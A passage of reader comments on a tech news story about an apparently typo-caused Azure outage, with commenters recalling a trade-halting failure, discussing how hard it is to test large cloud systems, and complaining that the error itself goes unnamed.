      Brought an entire country's trade to a standstill for several hours followed by three days of manual fallback with paper forms while they retrieved the data from the crashed transactions.

      I was very glad I had that signed piece of paper.

  19. jlturriff

    "Just run the test scripts." ―easy to say, but

    On a large system like Azure, it's almost impossible to cover all of the possible combinations of interactions and customer practices. Does a customer run multiple servers that talk to one another? How many different ways are there to back up your databases? Do the servers interact with non-Azure servers? etc.

    One would think that MS' test suite would include a realistic working set of databases (perhaps a clone of a production set, including some archival backups) that can be loaded from a known state, but it sounds like they don't.

  20. CowHorseFrog Silver badge

    Yet another article on this very story and AGAIN they don't actually point out what the typo or actual error was.

    May the gods have mercy on us...

    1. Anonymous Coward

      ".... they don't actually point out what the typo or actual error was."

      MS doesn't say, and it's quite difficult for anyone else to find out.
